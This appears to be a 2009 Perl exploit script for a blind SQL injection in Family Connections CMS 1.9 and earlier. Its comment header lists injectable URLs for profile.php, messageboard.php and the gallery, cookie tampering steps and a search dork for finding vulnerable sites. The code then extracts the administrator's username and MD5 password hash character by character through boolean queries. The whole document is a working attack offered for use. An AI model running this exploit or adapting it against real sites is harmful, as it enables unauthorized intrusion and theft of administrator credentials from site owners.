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Posted on 14 May 2009

#!/usr/bin/perl #*********************************************************************************************** #*********************************************************************************************** #** ** #** ** #** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** #** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** #** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** #** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\n#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- #** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ # [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** #** ** #** ** #** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** #** ¡PROUD TO BE SPANISH! ** #** ** #*********************************************************************************************** #*********************************************************************************************** # #---------------------------------------------------------------------------------------------- #| (GET var 'member') BLIND SQL INJECTION EXPLOIT | #|--------------------------------------------------------------------------------------------| #| | FAMILY CONNECTIONS <= v1.9 | | #| CMS INFORMATION: ------------------------------------- | #| | #|-->WEB: http://www.familycms.com/index.php | #|-->DOWNLOAD: http://www.familycms.com/download.php | #|-->DEMO: http://www.familycms.com/demo/index.php | #|-->CATEGORY: CMS/PORTAL | #|-->DESCRIPTION: A private, easy-to-use website where you can connect | #| with your friends and family. Share photos, messages, documents and more. | #|-->RELEASED: 2009-05-11 | #| | #| CMS VULNERABILITY: | #| | #|-->TESTED ON: firefox 3 | #|-->DORK: "2006-2009 Ryan Haudenschilt" | #|-->CATEGORY: BLIND SQL INJECTION EXPLOIT | #|-->AFFECT VERSION: <= 1.9 | #|-->Discovered Bug date: 2009-05-11 | #|-->Reported Bug date: 2009-05-11 | #|-->Fixed bug date: N/A | #|-->Info patch (????): N/A | #|-->Author: YEnH4ckEr | #|-->mail: y3nh4ck3r[at]gmail[dot]com | #|-->WEB/BLOG: N/A | #|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | #|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | #---------------------------------------------------------------------------------------------- # ############# #----------- #HISTORY: #----------- ############# # # #2008-06-14 --> http://www.milw0rm.com/exploits/5811 --> v1.4 --> Fixed # #2009-03-30 --> http://www.milw0rm.com/exploits/8319 --> v1.8.1 --> Not Fixed! (**) # #2009-04-03 --> http://www.milw0rm.com/exploits/8349 --> <=v1.8.2 --> Fixed # #2009-04-07 --> http://www.milw0rm.com/exploits/8361 --> <=v1.8.2 --> Not Fixed! (**) # # ################################# #------------------------------- #CURRENTLY:BLIND SQL INJECTION #------------------------------- ################################# # # #<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> # #<<<<-----------++++++++++++ Condition: Be register user +++++++++++++----------->>>> # # #========= #--------- #COOKIES: #--------- #========= # # #fcms_login_uname=your_real_name # #fcms_login_pw=your_real_pass # #fcms_login_id=your_real_id+and+1=1 # # #(Delete PHPSESSID) Result: True --> Show page # # #fcms_login_user=your_real_name # #fcms_login_pass=your_real_pass # #fcms_login_id=your_real_id+and+1=0 # # #(Delete PHPSESSID) Result: False --> Don't Show page # # #Exploits --> (**) # # #===================================== #------------------------------------- #(messageboard.php) GET var 'thread': #------------------------------------- #===================================== # # #http://[HOST]/[PATH]/messageboard.php?thread=1+AND+1=1 --> TRUE # #http://[HOST]/[PATH]/messageboard.php?thread=1+AND+1=0 --> FALSE # # #================================ #-------------------------------- #(profile.php) GET var 'member': #-------------------------------- #================================ # # #http://[HOST]/[PATH]/profile.php?member=2+AND+1=1 --> TRUE # #http://[HOST]/[PATH]/profile.php?member=2+AND+1=0 --> FALSE # # #=================================== #----------------------------------- #(gallery/index.php) GET var 'pid': #----------------------------------- #=================================== # # #http://[HOST]/[PATH]/gallery/index.php?uid=2&cid=2&pid=1+and+1=1 --> TRUE # #http://[HOST]/[PATH]/gallery/index.php?uid=2&cid=2&pid=1+and+1=0 --> FALSE # # ########################### #-------------------------- #CONDITIONS TO EXPLOITING: #-------------------------- ########################### # # #Valid username and password and id (Id is shown in cookies with autologin). # # ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: JosS, Ulises2k and all spanish Hack3Rs community! ## ##*******************************************************************## ####################################################################### ####################################################################### # # #-------------------EOF--INFO------------------------------->>>ENJOY IT! # # use LWP::UserAgent; use HTTP::Request; use Digest::MD5 qw(md5_hex); #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Family Connections <= v1.9 (GET var 'member') BLIND SQL Injection Exploit"); system ("color 02"); } } sub request { my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); my $request = HTTP::Request -> new(GET => $_[0]); my $cookieid="fcms_login_id=".$_[1]; my $cookieuname="fcms_login_uname=".$_[2]; my $cookiepw="fcms_login_pw=".$_[3]; my $cookie=$cookieid.";".$cookieuname.";".$cookiepw; $request->header(cookie => $cookie); my $outcode= $userag->request($request)->as_string; return $outcode; } sub helper { print " [!-!] Family Connections <= v1.9 (GET var 'member') BLIND SQLi Exploit "; print " [!-!] USAGE MODE: [!-!] "; print " [!-!] perl $0 [HOST] [PATH] [your-user] [your-pass] [your-id] "; print " [!-!] [HOST]: Web. "; print " [!-!] [PATH]: Home Path. Not use path= no-path "; print " [!-!] [your-user]: Your username. "; print " [!-!] [your-pass]: Your password. "; print " [!-!] [your-id]: Id in cookies --> Name=fcms_login_id. "; print " [!-!] Example: perl $0 'www.example.es' 'dogarchive' 'y3nh4ck3r' 'y3nh4ck3r' '123' "; } sub error { print " ----------------------------------------------------------------- "; print " WEB IS NOT VULNERABLE! "; print " Maybe --> "; print " 1.-Patched "; print " 2.-You aren't registered. Invalid username, password or id. "; print " EXPLOIT FAILED! "; print " ----------------------------------------------------------------- "; } sub testedblindsql { print " ----------------------------------------------------------------- "; print " WEB MAYBE BE VULNERABLE! "; print " Tested Blind SQL Injection. "; print " Starting exploit... "; print " ----------------------------------------------------------------- "; } sub brute_length{ #User length $exit=0; $i=0; while($exit==0){ my $blindsql=$_[0]."+AND+(SELECT+length(username)+FROM+fcms_users+WHERE+id=1)=".$i++; #injected code $output=&request($blindsql,$_[1],$_[2],$_[3]); if($output =~ (/<h3>$_[2], $_[2]</h3>/)){ $exit=1; }else{ $exit=0; } #Maybe patched. This is the max length of username if($i>25){ &error; exit(1); } } #Save column length $length=$i-1; print " <<<<<--------------------------------------------------------->>>>> "; print " Length User catched! "; print " Length User: ".$length." "; print " Bruteforcing User and Password values. "; print " Wait several minutes (15 o 20 minutes)... "; print " <<<<<--------------------------------------------------------->>>>> "; return $length; } sub exploiting { #Bruteforcing $values=""; $k=1; $z=48; while(($k<=$_[1]) && ($z<=126)){ my $blindsql=$_[0].'+AND+ascii(substring((SELECT+'.$_[2].'+FROM+fcms_users+WHERE+id=1),'.$k.',1))='.$z; $output=&request($blindsql,$_[3],$_[4],$_[5]); if ($output =~ (/<h3>$_[4], $_[4]</h3>/)) { $values=$values.chr($z); $k++; $z=47; } #new char $z++; } return $values; } #Main &lw; print " ######################################################### "; print " ######################################################### "; print " ## Family Connections <= v1.9 - BLIND SQLi Exploit ## "; print " ## Author: Y3nh4ck3r ## "; print " ## Contact:y3nh4ck3r[at]gmail[dot]com ## "; print " ## Proud to be Spanish! ## "; print " ######################################################### "; print " ######################################################### "; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; my $myuser=$ARGV[2]; my $mypass=md5_hex($ARGV[3]); my $myid=$ARGV[4]; #Build the uri #Build the uri if($path eq "no-path"){ $finalhost="http://".$host."/profile.php?member=".$myid; }else{ $finalhost="http://".$host."/".$path."/profile.php?member=".$myid; } #Check all variables needed $numArgs = $#ARGV + 1; if($numArgs<=4) { &helper; exit(1); } $finalrequest = $finalhost; #Testing blind sql injection $blindsql=$finalrequest."+AND+1=1"; $output=&request($blindsql,$myid,$myuser,$mypass); if ($output =~ (/<h3>($myuser, $myuser)</h3>/)) { #blind sql injection is available &testedblindsql; }else{ #Not injectable &error; exit(1); } #Bruteforcing length $length_user=&brute_length($finalrequest,$myid,$myuser,$mypass); #Bruteforcing username... $username=&exploiting($finalrequest,$length_user,'username',$myid,$myuser,$mypass); #Bruteforcing password... $passhash=&exploiting($finalrequest,32,'password',$myid,$myuser,$mypass); #final checking (perhaps admin id is not 2252) if((!$username) || (!$passhash)){ &error; exit(1); } print " ************************************************* "; print " ********* EXPLOIT EXECUTED WITH SUCCESS ******** "; print " ************************************************* "; print " Admin-username: ".$username." "; print " Admin-password(md5 hash): ".$passhash." "; print " <<----------------------FINISH!-------------------->> "; print " <<---------------Thanks to: y3hn4ck3r-------------->> "; print " <<------------------------EOF---------------------->> "; exit(1); #Ok...all job done